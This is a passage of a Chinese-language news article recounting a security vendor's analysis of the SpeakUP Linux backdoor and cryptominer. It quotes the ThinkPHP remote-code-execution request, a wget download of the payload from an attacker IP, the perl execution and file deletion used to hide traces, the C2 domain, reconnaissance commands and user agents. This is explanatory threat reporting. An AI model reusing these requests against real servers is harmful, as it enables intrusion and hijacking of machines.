带你了解新型Linux服务器杀手——SpeakUP_迅速域名

　　日前，全球屈指一首的Internet安全解决方案供应商Check Point IT安全部门研究人员发现了一个通过目前Linux服务器漏洞植入后门木马的黑客活动，此次攻击的目标涵盖了包括AWS主机在内的世界范围的全部服务器。攻击范围涵盖了共6个不同Linux发行版和macOS系统服务器中的已知漏洞，目前黑客的主要攻击目标集中在东亚与拉美地区的Linux服务器。



　　全球SpeakUP“受害者”分部


　　这次的恶意攻击的罪魁祸首被命名为SpeakUP，命名方式是以其中一台命令与控制（C2）服务器名称进行命名的。据悉Check Point的研究人员发现SpeakUP通过Linux服务器漏洞来植入后门木马的攻击方式可以绕过目前所有安全产品，这是由于该恶意软件中存储了大量此前出现过的攻击案例，致使SpeakUP可以优先识别目前存在的安全漏洞，并成功绕过几乎所有的杀毒软件的“双眼”。

　　
SpeakUP样本采集

　　在Check Point的分析报告中显示，首次发现的SpeakUP样本是今年1月14日在我国的服务器上发现的，该样本曾在1月9日被上传至VirusTotal网站（专业的免费可疑文件分析服务网站）。但经过严密的监测后发现，没有一家安全产品将SpeakUP恶意软件标为恶意。



　　这是因为为了逃避安全检测，SpeakUp的代码采用了base64加盐算法加密。不仅如此，C2通信也是采用了相同的方式加密。这也是为什么VirusTotal上的杀毒引擎无法将其检测为恶意的原因所在。

　　
SpeakUP感染全过程：

　　植入脚本阶段

　　根据Check Point报告中披露的数据来看，SpeakUP首先是利用ThinkPHP（轻量级PHP开发框架）的一个漏洞为攻击起点，从中植入一个PHP shell脚本。

　　使用GET请求（如下所示），通过ThinkPHP远程代码执行漏洞CVE-2018-20062将shell脚本发送到目标服务器：

　　s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^
>index.php

　　这个shell脚本接下来会通过query中的“module”参数来执行命令。

　　植入后门阶段

　　在脚本生效之后，SpeakUP将进行像服务器植入后门的操作

　　发送另一个HTTP请求（如下所示）到目标服务器：

　　/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

　　实际上，这是一个注入过程，目的是植入ibus payload并将其存储到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc

　　启动后门并抹除痕迹阶段

　　在植入后门成功后，SpeakUP将对服务器发送请求，启动后门，在启动后门后SpeakUP将通过删除文件来清楚自己的感染痕迹。

　　使用如下HTTP请求来执行后门：

　　/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc

　　
SpeakUP感染后果：

　　在Linux服务器被感染后，SpeakUP使用POST和GET请求来与C2通信，C2是被黑的speakupomaha[.]com.。

　　第一个post请求会发送受害者ID和其他介绍性的信息，比如安装的脚本的当前版本等。

　　对应的C2响应是needrgr，表示受感染的受害者之前未在服务器上注册，需要注册。

　　之后，木马会通过执行以下的Linux命令来POST机器的全部信息：

　　· Uname (-r, -v, -m, -n,-a, -s)

　　· Whoami

　　· Ifconfig –a

　　· Arp –a

　　· cat /proc/cpuinfo | grep -c “cpu family” 2>&1

　　· who –b



　　一旦受感染服务器注册完成，C2服务器就会发送新的任务——不同的C2服务器会命名受感染服务器来下载和执行不同的文件。

　　有一个需要注意的点是，SpeakUP使用了User-Agent用户代理。具体来说，SpeakUp定义了三个用户代理，而受感染服务器在与C2服务器进行通信时必须使用这些代理。其中两个代理是MacOS X User-Agent，第三个是经过哈希处理的字符串：

　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD

　　Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

　　E9BC3BD76216AFA560BFB5ACAF5731A3



　　目前，SpeakUp主要服务于XMRig矿工，为其提供“肉鸡（受感染服务器）”。根据XMRHunter网站的查询结果显示，攻击者的钱包目前拥有约107枚门罗币。

　　
SpeakUP强大的自我传播能力

　　攻击者还为SpeakUp配备了一个“i”模块，它实际上是一个python脚本，使得SpeakUP能够扫描和感染位于受感染服务器所处内网和外网的其他更多的Linux服务器。其主要功能有：

　　使用预定义的用户名和密码来暴力破解尝试登陆管理面板；

　　扫描受感染服务器的网络环境，检测共享相同内部和外部子网掩码的服务器上的特定端口的可用性；

　　尝试利用目标服务器上的远程代码执行漏洞